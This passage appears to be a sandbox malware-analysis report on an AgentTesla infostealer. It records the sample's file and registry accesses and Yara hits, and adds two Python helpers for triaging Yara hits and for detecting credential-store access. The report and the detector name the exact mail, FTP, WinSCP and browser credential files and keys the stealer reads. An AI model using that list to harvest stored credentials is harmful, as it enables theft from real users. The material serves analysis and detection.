                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\anyname.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\anyname.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Code function: 6_2_06145A94 GetUserNameW, 6_2_06145A94

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 14.0.jNnIJrO.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.anyname.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.0.jNnIJrO.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.jNnIJrO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.jNnIJrO.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.jNnIJrO.exe.3a9f700.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.anyname.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.anyname.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.0.jNnIJrO.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.jNnIJrO.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.0.jNnIJrO.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.jNnIJrO.exe.3bd5498.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.2.jNnIJrO.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.anyname.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.anyname.exe.3805498.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.anyname.exe.3805498.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jNnIJrO.exe.4025498.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.0.jNnIJrO.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 18.0.jNnIJrO.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jNnIJrO.exe.4025498.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.jNnIJrO.exe.400000.10.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.jNnIJrO.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.anyname.exe.400000.12.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.0.anyname.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.jNnIJrO.exe.3bd5498.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.anyname.exe.36cf700.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jNnIJrO.exe.3eef700.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 16.2.jNnIJrO.exe.38b6768.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.jNnIJrO.exe.3d06768.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.anyname.exe.34e6768.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.413072340.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.432184199.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.334391664.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.412466130.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.333862225.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.430664818.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.431529327.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.335234290.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.415518300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.818828907.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.333358376.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.429637125.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: anyname.exe PID: 6000, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: anyname.exe PID: 5608, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jNnIJrO.exe PID: 5952, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jNnIJrO.exe PID: 2276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jNnIJrO.exe PID: 5280, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jNnIJrO.exe PID: 6456, type: MEMORYSTR
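The Yara sources above use two naming schemes, and reading them by hand is tedious when the same family hits in six processes. The following Python is an added triage helper written for this page; it is not part of the Joe Sandbox report and not Joe Sandbox tooling. The field layout is this editor's interpretation of the names as they appear above, not something the report documents: for .sdmp names, process index (hex), stage, dump id, base address (hex), page protection (hex), type; for .unpack names, process index, stage, image name, base (hex), sequence number, optional .raw. The protection byte is decoded with the standard winnt.h constants (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE). The rule that a RWX dump sitting within 0x10000 of an unpacked image base marks a process whose image has been replaced by the payload, while a process with hits only in RW regions is a loader holding the decrypted payload in heap, is a heuristic of this editor's, and the input list is a subset of the sources quoted above.

```python
import re
from collections import defaultdict

# winnt.h memory-protection constants, used to decode the protection field.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}

# ASSUMED field layout of the two naming schemes (interpretation of the names on
# this page, not a documented format):
#   <proc idx hex>.<stage hex>.<dump id>.<base hex>.<protection hex>.<type hex>.sdmp
#   <proc idx>.<stage>.<image>.<base hex>.<n>[.raw].unpack
SDMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp$"
)
UNPACK_RE = re.compile(
    r"^(?P<proc>\d+)\.(?P<stage>\d+)\.(?P<image>.+?)\.(?P<base>[0-9A-Fa-f]+)\.(?P<n>\d+)(?P<raw>\.raw)?\.unpack$"
)


def parse_source(name):
    """Parse one 'File source:' value; returns None for names in neither scheme
    (e.g. 'Process Memory Space: ... PID: ...')."""
    m = SDMP_RE.match(name)
    if m:
        prot = int(m["prot"], 16)
        return {"kind": "sdmp", "proc": int(m["proc"], 16), "stage": int(m["stage"], 16),
                "base": int(m["base"], 16), "prot": PAGE_PROTECTION.get(prot, hex(prot)),
                "image": None}
    m = UNPACK_RE.match(name)
    if m:
        return {"kind": "unpack", "proc": int(m["proc"]), "stage": int(m["stage"]),
                "base": int(m["base"], 16), "prot": None, "image": m["image"]}
    return None


def summarize(sources):
    """Group Yara-hit sources by report process index."""
    procs = defaultdict(lambda: {"image": None, "rwx_bases": set(),
                                 "rw_bases": set(), "unpack_bases": set()})
    for name in sources:
        p = parse_source(name)
        if p is None:
            continue
        e = procs[p["proc"]]
        if p["kind"] == "unpack":
            e["image"] = p["image"]          # the unpack name carries the process image
            e["unpack_bases"].add(p["base"])
        elif p["prot"] == "PAGE_EXECUTE_READWRITE":
            e["rwx_bases"].add(p["base"])
        else:
            e["rw_bases"].add(p["base"])
    return dict(procs)


def classify_processes(summary, window=0x10000):
    """HEURISTIC (editor's own): 'injected' when a RWX dump lies just above an
    unpacked image base (payload mapped over the process image); 'loader' when
    hits are only in RW/heap-like regions (decrypted payload staged in memory)."""
    verdicts = {}
    for proc, e in sorted(summary.items()):
        near = {rwx for rwx in e["rwx_bases"] for ub in e["unpack_bases"] if 0 <= rwx - ub < window}
        if near:
            verdicts[proc] = ("injected", e["image"], sorted(near))
        elif e["rw_bases"] or e["unpack_bases"]:
            verdicts[proc] = ("loader", e["image"], sorted(e["unpack_bases"]))
    return verdicts


# Subset of the Yara sources listed on this page (not a constructed sample).
SAMPLE_SOURCES = [
    "14.0.jNnIJrO.exe.400000.4.unpack",
    "14.2.jNnIJrO.exe.400000.0.unpack",
    "6.2.anyname.exe.400000.0.unpack",
    "18.2.jNnIJrO.exe.400000.0.unpack",
    "1.2.anyname.exe.3805498.6.raw.unpack",
    "1.2.anyname.exe.36cf700.4.raw.unpack",
    "16.2.jNnIJrO.exe.3a9f700.5.raw.unpack",
    "10.2.jNnIJrO.exe.4025498.5.unpack",
    "0000000E.00000000.414176975.0000000000402000.00000040.00000001.sdmp",
    "0000000E.00000002.437781088.0000000000402000.00000040.00000001.sdmp",
    "00000006.00000002.818827980.0000000000402000.00000040.00000001.sdmp",
    "00000012.00000002.818828907.0000000000402000.00000040.00000001.sdmp",
    "00000001.00000002.339301678.0000000003449000.00000004.00000001.sdmp",
    "00000010.00000002.437858484.0000000003819000.00000004.00000001.sdmp",
    "0000000A.00000002.421939439.0000000003C69000.00000004.00000001.sdmp",
    "Process Memory Space: anyname.exe PID: 6000",
]

if __name__ == "__main__":
    for proc, (role, image, bases) in classify_processes(summarize(SAMPLE_SOURCES)).items():
        print(f"process {proc:2d} {image:12s} {role:8s} {[hex(b) for b in bases]}")
```

Run as-is it prints processes 6, 14 and 18 (the second-stage anyname.exe and jNnIJrO.exe instances) as "injected" with the RWX region at 0x402000 directly above the 0x400000 image base, and processes 1, 10 and 16 (the first-stage launchers) as "loader" with their payload copies in heap addresses, which matches the "Injects a PE file into a foreign processes" signature in the summary.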
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\anyname.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 00000012.00000002.824325494.00000000030E1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.823366416.0000000002DD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.439216232.0000000002FE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: anyname.exe PID: 5608, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jNnIJrO.exe PID: 2276, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: jNnIJrO.exe PID: 6456, type: MEMORYSTR
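The four signatures above are, between them, a precise list of the credential stores this sample reads: the Thunderbird and Firefox profiles.ini, the Outlook and IncrediMail profile keys, the WinSCP sessions key, SmartFTP favourites, FileZilla recentservers.xml and Chrome's Cookies and Login Data. That list is directly usable as detection content. The following Python is an added example for this page, not part of the report and not Joe Sandbox code: it applies the list to file-open and registry-open events flattened to (process path, target) pairs, as one would get from Sysmon Event ID 11/12/13 or EDR file telemetry, and flags a process when it touches two or more unrelated stores or runs from a user-writable directory. The allow-list of owning applications, the user-writable-path heuristic, and the benign events mixed into the sample are constructed assumptions; the malicious events replay the accesses listed above.

```python
import re
from collections import defaultdict

# Credential stores read by this sample, grouped by the report's signature.
# Paths are the ones listed in the signatures above (user-specific prefix dropped).
CREDENTIAL_STORES = {
    "mail": [
        r"\AppData\Roaming\Thunderbird\profiles.ini",
        r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook",
        r"HKEY_CURRENT_USER\Software\IncrediMail\Identities",
    ],
    "scp/sftp": [r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"],
    "ftp": [r"\AppData\Roaming\SmartFTP\Client 2.0\Favorites",
            r"\AppData\Roaming\FileZilla\recentservers.xml"],
    "browser": [r"\AppData\Roaming\Mozilla\Firefox\profiles.ini",
                r"\Google\Chrome\User Data\Default\Cookies",
                r"\Google\Chrome\User Data\Default\Login Data"],
}

# ASSUMED allow-list: the applications that legitimately own each store. Tune per estate.
OWNERS = {"thunderbird.exe", "outlook.exe", "incmail.exe", "winscp.exe",
          "filezilla.exe", "smartftp.exe", "firefox.exe", "chrome.exe"}

# ASSUMED heuristic: binaries launched from these user-writable locations deserve
# extra suspicion (both stages of this sample run from them).
USER_WRITABLE = re.compile(r"\\AppData\\(Local\\Temp|Roaming)\\", re.IGNORECASE)


def classify_event(target):
    """Return the credential-store category a file/registry target belongs to, or None."""
    t = target.lower()
    for category, patterns in CREDENTIAL_STORES.items():
        if any(p.lower() in t for p in patterns):
            return category
    return None


def score_process(events):
    """events: iterable of (process_path, target). Returns per-process findings,
    ignoring accesses by the application that owns the store."""
    findings = defaultdict(lambda: {"categories": set(), "targets": [], "user_writable": False})
    for proc, target in events:
        category = classify_event(target)
        if category is None:
            continue
        if proc.rsplit("\\", 1)[-1].lower() in OWNERS:
            continue
        f = findings[proc]
        f["categories"].add(category)
        f["targets"].append(target)
        f["user_writable"] = bool(USER_WRITABLE.search(proc))
    return dict(findings)


def verdict(findings):
    """Flag a process that touches >= 2 unrelated store categories, or any store
    while running from a user-writable directory. Returns {process: [categories]}."""
    return {proc: sorted(f["categories"]) for proc, f in findings.items()
            if len(f["categories"]) >= 2 or f["user_writable"]}


# Constructed sample: the first ten events replay the report's signatures above,
# the last four are invented benign activity.
SAMPLE_EVENTS = [
    (r"C:\Users\user\AppData\Local\Temp\anyname.exe", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (r"C:\Users\user\AppData\Local\Temp\anyname.exe", r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"),
    (r"C:\Users\user\AppData\Local\Temp\anyname.exe", r"HKEY_CURRENT_USER\Software\IncrediMail\Identities"),
    (r"C:\Users\user\AppData\Local\Temp\anyname.exe", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    (r"C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (r"C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe", r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"),
    (r"C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe", r"C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect"),
    (r"C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe", r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"),
    (r"C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (r"C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Program Files\Google\Chrome\Application\chrome.exe", r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"),
    (r"C:\Program Files\Mozilla Thunderbird\thunderbird.exe", r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"),
    (r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"),
    (r"C:\Windows\explorer.exe", r"C:\Users\user\Documents\notes.txt"),
]

if __name__ == "__main__":
    for proc, categories in verdict(score_process(SAMPLE_EVENTS)).items():
        print(f"ALERT {proc}: credential stores touched: {', '.join(categories)}")
```

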